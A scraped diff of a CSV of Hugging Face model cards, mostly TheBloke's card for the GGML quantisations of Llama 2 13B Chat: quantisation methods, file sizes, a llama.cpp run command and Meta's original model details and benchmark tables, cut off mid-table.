13477364499}",1,,0,,0,"https://huggingface.co/MaziyarPanahi/LWM-14b-Text-Chat-1M-GGUF, https://huggingface.co/mradermacher/LWM-14b-Text-Chat-1M-GGUF",2,,0,huggingface/InferenceSupport/discussions/new?title=mergekit-community/LWM-14b-Text-Chat-1M&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmergekit-community%2FLWM-14b-Text-Chat-1M%5D(%2Fmergekit-community%2FLWM-14b-Text-Chat-1M)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
Llama-2-13B-chat-GGML_finetunes_20250425_125929.csv_finetunes_20250425_125929.csv
ADDED
|
@@ -0,0 +1,299 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
TheBloke/Llama-2-13B-chat-GGML,"---
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
license: other
|
| 6 |
+
tags:
|
| 7 |
+
- facebook
|
| 8 |
+
- meta
|
| 9 |
+
- pytorch
|
| 10 |
+
- llama
|
| 11 |
+
- llama-2
|
| 12 |
+
model_name: Llama 2 13B Chat
|
| 13 |
+
inference: false
|
| 14 |
+
model_creator: Meta Llama 2
|
| 15 |
+
model_link: https://huggingface.co/meta-llama/Llama-2-13b-chat-hf
|
| 16 |
+
model_type: llama
|
| 17 |
+
pipeline_tag: text-generation
|
| 18 |
+
quantized_by: TheBloke
|
| 19 |
+
base_model: meta-llama/Llama-2-13b-chat-hf
|
| 20 |
+
---
|
| 21 |
+
|
| 22 |
+
<!-- header start -->
|
| 23 |
+
<!-- 200823 -->
|
| 24 |
+
<div style=""width: auto; margin-left: auto; margin-right: auto"">
|
| 25 |
+
<img src=""https://i.imgur.com/EBdldam.jpg"" alt=""TheBlokeAI"" style=""width: 100%; min-width: 400px; display: block; margin: auto;"">
|
| 26 |
+
</div>
|
| 27 |
+
<div style=""display: flex; justify-content: space-between; width: 100%;"">
|
| 28 |
+
<div style=""display: flex; flex-direction: column; align-items: flex-start;"">
|
| 29 |
+
<p style=""margin-top: 0.5em; margin-bottom: 0em;""><a href=""https://discord.gg/theblokeai"">Chat & support: TheBloke's Discord server</a></p>
|
| 30 |
+
</div>
|
| 31 |
+
<div style=""display: flex; flex-direction: column; align-items: flex-end;"">
|
| 32 |
+
<p style=""margin-top: 0.5em; margin-bottom: 0em;""><a href=""https://www.patreon.com/TheBlokeAI"">Want to contribute? TheBloke's Patreon page</a></p>
|
| 33 |
+
</div>
|
| 34 |
+
</div>
|
| 35 |
+
<div style=""text-align:center; margin-top: 0em; margin-bottom: 0em""><p style=""margin-top: 0.25em; margin-bottom: 0em;"">TheBloke's LLM work is generously supported by a grant from <a href=""https://a16z.com"">andreessen horowitz (a16z)</a></p></div>
|
| 36 |
+
<hr style=""margin-top: 1.0em; margin-bottom: 1.0em;"">
|
| 37 |
+
<!-- header end -->
|
| 38 |
+
|
| 39 |
+
# Llama 2 13B Chat - GGML
|
| 40 |
+
- Model creator: [Meta Llama 2](https://huggingface.co/meta-llama)
|
| 41 |
+
- Original model: [Llama 2 13B Chat](https://huggingface.co/meta-llama/Llama-2-13b-chat-hf)
|
| 42 |
+
|
| 43 |
+
## Description
|
| 44 |
+
|
| 45 |
+
This repo contains GGML format model files for [Meta's Llama 2 13B-chat](https://huggingface.co/meta-llama/Llama-2-13b-chat-hf).
|
| 46 |
+
|
| 47 |
+
### Important note regarding GGML files.
|
| 48 |
+
|
| 49 |
+
The GGML format has now been superseded by GGUF. As of August 21st 2023, [llama.cpp](https://github.com/ggerganov/llama.cpp) no longer supports GGML models. Third party clients and libraries are expected to still support it for a time, but many may also drop support.
|
| 50 |
+
|
| 51 |
+
Please use the GGUF models instead.
|
| 52 |
+
### About GGML
|
| 53 |
+
|
| 54 |
+
GGML files are for CPU + GPU inference using [llama.cpp](https://github.com/ggerganov/llama.cpp) and libraries and UIs which support this format, such as:
|
| 55 |
+
* [text-generation-webui](https://github.com/oobabooga/text-generation-webui), the most popular web UI. Supports NVidia CUDA GPU acceleration.
|
| 56 |
+
* [KoboldCpp](https://github.com/LostRuins/koboldcpp), a powerful GGML web UI with GPU acceleration on all platforms (CUDA and OpenCL). Especially good for story telling.
|
| 57 |
+
* [LM Studio](https://lmstudio.ai/), a fully featured local GUI with GPU acceleration on both Windows (NVidia and AMD), and macOS.
|
| 58 |
+
* [LoLLMS Web UI](https://github.com/ParisNeo/lollms-webui), a great web UI with CUDA GPU acceleration via the c_transformers backend.
|
| 59 |
+
* [ctransformers](https://github.com/marella/ctransformers), a Python library with GPU accel, LangChain support, and OpenAI-compatible AI server.
|
| 60 |
+
* [llama-cpp-python](https://github.com/abetlen/llama-cpp-python), a Python library with GPU accel, LangChain support, and OpenAI-compatible API server.
|
| 61 |
+
|
| 62 |
+
## Repositories available
|
| 63 |
+
|
| 64 |
+
* [GPTQ models for GPU inference, with multiple quantisation parameter options.](https://huggingface.co/TheBloke/Llama-2-13B-chat-GPTQ)
|
| 65 |
+
* [2, 3, 4, 5, 6 and 8-bit GGUF models for CPU+GPU inference](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGUF)
|
| 66 |
+
* [2, 3, 4, 5, 6 and 8-bit GGML models for CPU+GPU inference (deprecated)](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML)
|
| 67 |
+
* [Meta Llama 2's original unquantised fp16 model in pytorch format, for GPU inference and for further conversions](https://huggingface.co/meta-llama/Llama-2-13B-chat-hf)
|
| 68 |
+
|
| 69 |
+
## Prompt template: Llama-2-Chat
|
| 70 |
+
|
| 71 |
+
```
|
| 72 |
+
[INST] <<SYS>>
|
| 73 |
+
You are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, racist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature. If a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don't know the answer to a question, please don't share false information.
|
| 74 |
+
<</SYS>>
|
| 75 |
+
{prompt}[/INST]
|
| 76 |
+
|
| 77 |
+
```
|
| 78 |
+
|
| 79 |
+
<!-- compatibility_ggml start -->
|
| 80 |
+
## Compatibility
|
| 81 |
+
|
| 82 |
+
These quantised GGML files are compatible with llama.cpp between June 6th (commit `2d43387`) and August 21st 2023.
|
| 83 |
+
|
| 84 |
+
For support with latest llama.cpp, please use GGUF files instead.
|
| 85 |
+
|
| 86 |
+
The final llama.cpp commit with support for GGML was: [dadbed99e65252d79f81101a392d0d6497b86caa](https://github.com/ggerganov/llama.cpp/commit/dadbed99e65252d79f81101a392d0d6497b86caa)
|
| 87 |
+
|
| 88 |
+
As of August 23rd 2023 they are still compatible with all UIs, libraries and utilities which use GGML. This may change in the future.
|
| 89 |
+
|
| 90 |
+
## Explanation of the new k-quant methods
|
| 91 |
+
<details>
|
| 92 |
+
<summary>Click to see details</summary>
|
| 93 |
+
|
| 94 |
+
The new methods available are:
|
| 95 |
+
* GGML_TYPE_Q2_K - ""type-1"" 2-bit quantization in super-blocks containing 16 blocks, each block having 16 weight. Block scales and mins are quantized with 4 bits. This ends up effectively using 2.5625 bits per weight (bpw)
|
| 96 |
+
* GGML_TYPE_Q3_K - ""type-0"" 3-bit quantization in super-blocks containing 16 blocks, each block having 16 weights. Scales are quantized with 6 bits. This end up using 3.4375 bpw.
|
| 97 |
+
* GGML_TYPE_Q4_K - ""type-1"" 4-bit quantization in super-blocks containing 8 blocks, each block having 32 weights. Scales and mins are quantized with 6 bits. This ends up using 4.5 bpw.
|
| 98 |
+
* GGML_TYPE_Q5_K - ""type-1"" 5-bit quantization. Same super-block structure as GGML_TYPE_Q4_K resulting in 5.5 bpw
|
| 99 |
+
* GGML_TYPE_Q6_K - ""type-0"" 6-bit quantization. Super-blocks with 16 blocks, each block having 16 weights. Scales are quantized with 8 bits. This ends up using 6.5625 bpw
|
| 100 |
+
* GGML_TYPE_Q8_K - ""type-0"" 8-bit quantization. Only used for quantizing intermediate results. The difference to the existing Q8_0 is that the block size is 256. All 2-6 bit dot products are implemented for this quantization type.
|
| 101 |
+
|
| 102 |
+
Refer to the Provided Files table below to see what files use which methods, and how.
|
| 103 |
+
</details>
|
| 104 |
+
<!-- compatibility_ggml end -->
|
| 105 |
+
|
| 106 |
+
## Provided files
|
| 107 |
+
|
| 108 |
+
| Name | Quant method | Bits | Size | Max RAM required | Use case |
|
| 109 |
+
| ---- | ---- | ---- | ---- | ---- | ----- |
|
| 110 |
+
| [llama-2-13b-chat.ggmlv3.q2_K.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q2_K.bin) | q2_K | 2 | 5.51 GB| 8.01 GB | New k-quant method. Uses GGML_TYPE_Q4_K for the attention.vw and feed_forward.w2 tensors, GGML_TYPE_Q2_K for the other tensors. |
|
| 111 |
+
| [llama-2-13b-chat.ggmlv3.q3_K_S.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q3_K_S.bin) | q3_K_S | 3 | 5.66 GB| 8.16 GB | New k-quant method. Uses GGML_TYPE_Q3_K for all tensors |
|
| 112 |
+
| [llama-2-13b-chat.ggmlv3.q3_K_M.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q3_K_M.bin) | q3_K_M | 3 | 6.31 GB| 8.81 GB | New k-quant method. Uses GGML_TYPE_Q4_K for the attention.wv, attention.wo, and feed_forward.w2 tensors, else GGML_TYPE_Q3_K |
|
| 113 |
+
| [llama-2-13b-chat.ggmlv3.q3_K_L.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q3_K_L.bin) | q3_K_L | 3 | 6.93 GB| 9.43 GB | New k-quant method. Uses GGML_TYPE_Q5_K for the attention.wv, attention.wo, and feed_forward.w2 tensors, else GGML_TYPE_Q3_K |
|
| 114 |
+
| [llama-2-13b-chat.ggmlv3.q4_0.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q4_0.bin) | q4_0 | 4 | 7.32 GB| 9.82 GB | Original quant method, 4-bit. |
|
| 115 |
+
| [llama-2-13b-chat.ggmlv3.q4_K_S.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q4_K_S.bin) | q4_K_S | 4 | 7.37 GB| 9.87 GB | New k-quant method. Uses GGML_TYPE_Q4_K for all tensors |
|
| 116 |
+
| [llama-2-13b-chat.ggmlv3.q4_K_M.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q4_K_M.bin) | q4_K_M | 4 | 7.87 GB| 10.37 GB | New k-quant method. Uses GGML_TYPE_Q6_K for half of the attention.wv and feed_forward.w2 tensors, else GGML_TYPE_Q4_K |
|
| 117 |
+
| [llama-2-13b-chat.ggmlv3.q4_1.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q4_1.bin) | q4_1 | 4 | 8.14 GB| 10.64 GB | Original quant method, 4-bit. Higher accuracy than q4_0 but not as high as q5_0. However has quicker inference than q5 models. |
|
| 118 |
+
| [llama-2-13b-chat.ggmlv3.q5_0.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q5_0.bin) | q5_0 | 5 | 8.95 GB| 11.45 GB | Original quant method, 5-bit. Higher accuracy, higher resource usage and slower inference. |
|
| 119 |
+
| [llama-2-13b-chat.ggmlv3.q5_K_S.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q5_K_S.bin) | q5_K_S | 5 | 8.97 GB| 11.47 GB | New k-quant method. Uses GGML_TYPE_Q5_K for all tensors |
|
| 120 |
+
| [llama-2-13b-chat.ggmlv3.q5_K_M.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q5_K_M.bin) | q5_K_M | 5 | 9.23 GB| 11.73 GB | New k-quant method. Uses GGML_TYPE_Q6_K for half of the attention.wv and feed_forward.w2 tensors, else GGML_TYPE_Q5_K |
|
| 121 |
+
| [llama-2-13b-chat.ggmlv3.q5_1.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q5_1.bin) | q5_1 | 5 | 9.76 GB| 12.26 GB | Original quant method, 5-bit. Even higher accuracy, resource usage and slower inference. |
|
| 122 |
+
| [llama-2-13b-chat.ggmlv3.q6_K.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q6_K.bin) | q6_K | 6 | 10.68 GB| 13.18 GB | New k-quant method. Uses GGML_TYPE_Q8_K for all tensors - 6-bit quantization |
|
| 123 |
+
| [llama-2-13b-chat.ggmlv3.q8_0.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q8_0.bin) | q8_0 | 8 | 13.83 GB| 16.33 GB | Original quant method, 8-bit. Almost indistinguishable from float16. High resource use and slow. Not recommended for most users. |
|
| 124 |
+
|
| 125 |
+
**Note**: the above RAM figures assume no GPU offloading. If layers are offloaded to the GPU, this will reduce RAM usage and use VRAM instead.
|
| 126 |
+
|
| 127 |
+
## How to run in `llama.cpp`
|
| 128 |
+
|
| 129 |
+
Make sure you are using `llama.cpp` from commit [dadbed99e65252d79f81101a392d0d6497b86caa](https://github.com/ggerganov/llama.cpp/commit/dadbed99e65252d79f81101a392d0d6497b86caa) or earlier.
|
| 130 |
+
|
| 131 |
+
For compatibility with latest llama.cpp, please use GGUF files instead.
|
| 132 |
+
|
| 133 |
+
```
|
| 134 |
+
./main -t 10 -ngl 32 -m llama-2-13b-chat.ggmlv3.q4_K_M.bin --color -c 2048 --temp 0.7 --repeat_penalty 1.1 -n -1 -p ""[INST] <<SYS>>\nYou are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, racist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature. If a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don't know the answer to a question, please don't share false information.\n<</SYS>>\nWrite a story about llamas[/INST]""
|
| 135 |
+
```
|
| 136 |
+
Change `-t 10` to the number of physical CPU cores you have. For example if your system has 8 cores/16 threads, use `-t 8`.
|
| 137 |
+
|
| 138 |
+
Change `-ngl 32` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
|
| 139 |
+
|
| 140 |
+
Change `-c 2048` to the desired sequence length for this model. For example, `-c 4096` for a Llama 2 model. For models that use RoPE, add `--rope-freq-base 10000 --rope-freq-scale 0.5` for doubled context, or `--rope-freq-base 10000 --rope-freq-scale 0.25` for 4x context.
|
| 141 |
+
|
| 142 |
+
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
|
| 143 |
+
|
| 144 |
+
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
|
| 145 |
+
|
| 146 |
+
## How to run in `text-generation-webui`
|
| 147 |
+
|
| 148 |
+
Further instructions here: [text-generation-webui/docs/llama.cpp.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/llama.cpp.md).
|
| 149 |
+
|
| 150 |
+
<!-- footer start -->
|
| 151 |
+
<!-- 200823 -->
|
| 152 |
+
## Discord
|
| 153 |
+
|
| 154 |
+
For further support, and discussions on these models and AI in general, join us at:
|
| 155 |
+
|
| 156 |
+
[TheBloke AI's Discord server](https://discord.gg/theblokeai)
|
| 157 |
+
|
| 158 |
+
## Thanks, and how to contribute.
|
| 159 |
+
|
| 160 |
+
Thanks to the [chirper.ai](https://chirper.ai) team!
|
| 161 |
+
|
| 162 |
+
I've had a lot of people ask if they can contribute. I enjoy providing models and helping people, and would love to be able to spend even more time doing it, as well as expanding into new projects like fine tuning/training.
|
| 163 |
+
|
| 164 |
+
If you're able and willing to contribute it will be most gratefully received and will help me to keep providing more models, and to start work on new AI projects.
|
| 165 |
+
|
| 166 |
+
Donaters will get priority support on any and all AI/LLM/model questions and requests, access to a private Discord room, plus other benefits.
|
| 167 |
+
|
| 168 |
+
* Patreon: https://patreon.com/TheBlokeAI
|
| 169 |
+
* Ko-Fi: https://ko-fi.com/TheBlokeAI
|
| 170 |
+
|
| 171 |
+
**Special thanks to**: Aemon Algiz.
|
| 172 |
+
|
| 173 |
+
**Patreon special mentions**: Russ Johnson, J, alfie_i, Alex, NimbleBox.ai, Chadd, Mandus, Nikolai Manek, Ken Nordquist, ya boyyy, Illia Dulskyi, Viktor Bowallius, vamX, Iucharbius, zynix, Magnesian, Clay Pascal, Pierre Kircher, Enrico Ros, Tony Hughes, Elle, Andrey, knownsqashed, Deep Realms, Jerry Meng, Lone Striker, Derek Yates, Pyrater, Mesiah Bishop, James Bentley, Femi Adebogun, Brandon Frisco, SuperWojo, Alps Aficionado, Michael Dempsey, Vitor Caleffi, Will Dee, Edmond Seymore, usrbinkat, LangChain4j, Kacper Wikieł, Luke Pendergrass, John Detwiler, theTransient, Nathan LeClaire, Tiffany J. Kim, biorpg, Eugene Pentland, Stanislav Ovsiannikov, Fred von Graf, terasurfer, Kalila, Dan Guido, Nitin Borwankar, 阿明, Ai Maven, John Villwock, Gabriel Puliatti, Stephen Murray, Asp the Wyvern, danny, Chris Smitley, ReadyPlayerEmma, S_X, Daniel P. Andersen, Olakabola, Jeffrey Morgan, Imad Khwaja, Caitlyn Gatomon, webtim, Alicia Loh, Trenton Dambrowitz, Swaroop Kallakuri, Erik Bjäreholt, Leonard Tan, Spiking Neurons AB, Luke @flexchar, Ajan Kanaga, Thomas Belote, Deo Leter, RoA, Willem Michiel, transmissions 11, subjectnull, Matthew Berman, Joseph William Delisle, David Ziegler, Michael Davis, Johann-Peter Hartmann, Talal Aujan, senxiiz, Artur Olbinski, Rainer Wilmers, Spencer Kim, Fen Risland, Cap'n Zoog, Rishabh Srivastava, Michael Levine, Geoffrey Montalvo, Sean Connelly, Alexandros Triantafyllidis, Pieter, Gabriel Tamborski, Sam, Subspace Studios, Junyu Yang, Pedro Madruga, Vadim, Cory Kujawski, K, Raven Klaugh, Randy H, Mano Prime, Sebastain Graf, Space Cruiser
|
| 174 |
+
|
| 175 |
+
|
| 176 |
+
Thank you to all my generous patrons and donaters!
|
| 177 |
+
|
| 178 |
+
And thank you again to a16z for their generous grant.
|
| 179 |
+
|
| 180 |
+
<!-- footer end -->
|
| 181 |
+
|
| 182 |
+
# Original model card: Meta's Llama 2 13B-chat
|
| 183 |
+
|
| 184 |
+
# **Llama 2**
|
| 185 |
+
Llama 2 is a collection of pretrained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters. This is the repository for the 13B fine-tuned model, optimized for dialogue use cases and converted for the Hugging Face Transformers format. Links to other models can be found in the index at the bottom.
|
| 186 |
+
|
| 187 |
+
## Model Details
|
| 188 |
+
*Note: Use of this model is governed by the Meta license. In order to download the model weights and tokenizer, please visit the [website](https://ai.meta.com/resources/models-and-libraries/llama-downloads/) and accept our License before requesting access here.*
|
| 189 |
+
|
| 190 |
+
Meta developed and publicly released the Llama 2 family of large language models (LLMs), a collection of pretrained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters. Our fine-tuned LLMs, called Llama-2-Chat, are optimized for dialogue use cases. Llama-2-Chat models outperform open-source chat models on most benchmarks we tested, and in our human evaluations for helpfulness and safety, are on par with some popular closed-source models like ChatGPT and PaLM.
|
| 191 |
+
|
| 192 |
+
**Model Developers** Meta
|
| 193 |
+
|
| 194 |
+
**Variations** Llama 2 comes in a range of parameter sizes — 7B, 13B, and 70B — as well as pretrained and fine-tuned variations.
|
| 195 |
+
|
| 196 |
+
**Input** Models input text only.
|
| 197 |
+
|
| 198 |
+
**Output** Models generate text only.
|
| 199 |
+
|
| 200 |
+
**Model Architecture** Llama 2 is an auto-regressive language model that uses an optimized transformer architecture. The tuned versions use supervised fine-tuning (SFT) and reinforcement learning with human feedback (RLHF) to align to human preferences for helpfulness and safety.
|
| 201 |
+
|
| 202 |
+
|
| 203 |
+
||Training Data|Params|Content Length|GQA|Tokens|LR|
|
| 204 |
+
|---|---|---|---|---|---|---|
|
| 205 |
+
|Llama 2|*A new mix of publicly available online data*|7B|4k|✗|2.0T|3.0 x 10<sup>-4</sup>|
|
| 206 |
+
|Llama 2|*A new mix of publicly available online data*|13B|4k|✗|2.0T|3.0 x 10<sup>-4</sup>|
|
| 207 |
+
|Llama 2|*A new mix of publicly available online data*|70B|4k|✔|2.0T|1.5 x 10<sup>-4</sup>|
|
| 208 |
+
|
| 209 |
+
*Llama 2 family of models.* Token counts refer to pretraining data only. All models are trained with a global batch-size of 4M tokens. Bigger models - 70B -- use Grouped-Query Attention (GQA) for improved inference scalability.
|
| 210 |
+
|
| 211 |
+
**Model Dates** Llama 2 was trained between January 2023 and July 2023.
|
| 212 |
+
|
| 213 |
+
**Status** This is a static model trained on an offline dataset. Future versions of the tuned models will be released as we improve model safety with community feedback.
|
| 214 |
+
|
| 215 |
+
**License** A custom commercial license is available at: [https://ai.meta.com/resources/models-and-libraries/llama-downloads/](https://ai.meta.com/resources/models-and-libraries/llama-downloads/)
|
| 216 |
+
|
| 217 |
+
**Research Paper** [""Llama-2: Open Foundation and Fine-tuned Chat Models""](arxiv.org/abs/2307.09288)
|
| 218 |
+
|
| 219 |
+
## Intended Use
|
| 220 |
+
**Intended Use Cases** Llama 2 is intended for commercial and research use in English. Tuned models are intended for assistant-like chat, whereas pretrained models can be adapted for a variety of natural language generation tasks.
|
| 221 |
+
|
| 222 |
+
To get the expected features and performance for the chat versions, a specific formatting needs to be followed, including the `INST` and `<<SYS>>` tags, `BOS` and `EOS` tokens, and the whitespaces and breaklines in between (we recommend calling `strip()` on inputs to avoid double-spaces). See our reference code in github for details: [`chat_completion`](https://github.com/facebookresearch/llama/blob/main/llama/generation.py#L212).
|
| 223 |
+
|
| 224 |
+
**Out-of-scope Uses** Use in any manner that violates applicable laws or regulations (including trade compliance laws).Use in languages other than English. Use in any other way that is prohibited by the Acceptable Use Policy and Licensing Agreement for Llama 2.
|
| 225 |
+
|
| 226 |
+
## Hardware and Software
|
| 227 |
+
**Training Factors** We used custom training libraries, Meta's Research Super Cluster, and production clusters for pretraining. Fine-tuning, annotation, and evaluation were also performed on third-party cloud compute.
|
| 228 |
+
|
| 229 |
+
**Carbon Footprint** Pretraining utilized a cumulative 3.3M GPU hours of computation on hardware of type A100-80GB (TDP of 350-400W). Estimated total emissions were 539 tCO2eq, 100% of which were offset by Meta’s sustainability program.
|
| 230 |
+
|
| 231 |
+
||Time (GPU hours)|Power Consumption (W)|Carbon Emitted(tCO<sub>2</sub>eq)|
|
| 232 |
+
|---|---|---|---|
|
| 233 |
+
|Llama 2 7B|184320|400|31.22|
|
| 234 |
+
|Llama 2 13B|368640|400|62.44|
|
| 235 |
+
|Llama 2 70B|1720320|400|291.42|
|
| 236 |
+
|Total|3311616||539.00|
|
| 237 |
+
|
| 238 |
+
**CO<sub>2</sub> emissions during pretraining.** Time: total GPU time required for training each model. Power Consumption: peak power capacity per GPU device for the GPUs used adjusted for power usage efficiency. 100% of the emissions are directly offset by Meta's sustainability program, and because we are openly releasing these models, the pretraining costs do not need to be incurred by others.
|
| 239 |
+
|
| 240 |
+
## Training Data
|
| 241 |
+
**Overview** Llama 2 was pretrained on 2 trillion tokens of data from publicly available sources. The fine-tuning data includes publicly available instruction datasets, as well as over one million new human-annotated examples. Neither the pretraining nor the fine-tuning datasets include Meta user data.
|
| 242 |
+
|
| 243 |
+
**Data Freshness** The pretraining data has a cutoff of September 2022, but some tuning data is more recent, up to July 2023.
|
| 244 |
+
|
| 245 |
+
## Evaluation Results
|
| 246 |
+
|
| 247 |
+
In this section, we report the results for the Llama 1 and Llama 2 models on standard academic benchmarks.For all the evaluations, we use our internal evaluations library.
|
| 248 |
+
|
| 249 |
+
|Model|Size|Code|Commonsense Reasoning|World Knowledge|Reading Comprehension|Math|MMLU|BBH|AGI Eval|
|
| 250 |
+
|---|---|---|---|---|---|---|---|---|---|
|
| 251 |
+
|Llama 1|7B|14.1|60.8|46.2|58.5|6.95|35.1|30.3|23.9|
|
| 252 |
+
|Llama 1|13B|18.9|66.1|52.6|62.3|10.9|46.9|37.0|33.9|
|
| 253 |
+
|Llama 1|33B|26.0|70.0|58.4|67.6|21.4|57.8|39.8|41.7|
|
| 254 |
+
|Llama 1|65B|30.7|70.7|60.5|68.6|30.8|63.4|43.5|47.6|
|
| 255 |
+
|Llama 2|7B|16.8|63.9|48.9|61.3|14.6|45.3|32.6|29.3|
|
| 256 |
+
|Llama 2|13B|24.5|66.9|55.4|65.8|28.7|54.8|39.4|39.1|
|
| 257 |
+
|Llama 2|70B|**37.5**|**71.9**|**63.6**|**69.4**|**35.2**|**68.9**|**51.2**|**54.2**|
|
| 258 |
+
|
| 259 |
+
**Overall performance on grouped academic benchmarks.** *Code:* We report the average pass@1 scores of our models on HumanEval and MBPP. *Commonsense Reasoning:* We report the average of PIQA, SIQA, HellaSwag, WinoGrande, ARC easy and challenge, OpenBookQA, and CommonsenseQA. We report 7-shot results for CommonSenseQA and 0-shot results for all other benchmarks. *World Knowledge:* We evaluate the 5-shot performance on NaturalQuestions and TriviaQA and report the average. *Reading Comprehension:* For reading comprehension, we report the 0-shot average on SQuAD, QuAC, and BoolQ. *MATH:* We report the average of the GSM8K (8 shot) and MATH (4 shot) benchmarks at top 1.
|
| 260 |
+
|
| 261 |
+
|||TruthfulQA|Toxigen|
|
| 262 |
+
|---|---|---|---|
|
| 263 |
+
|Llama 1|7B|27.42|23.00|
|
| 264 |
+
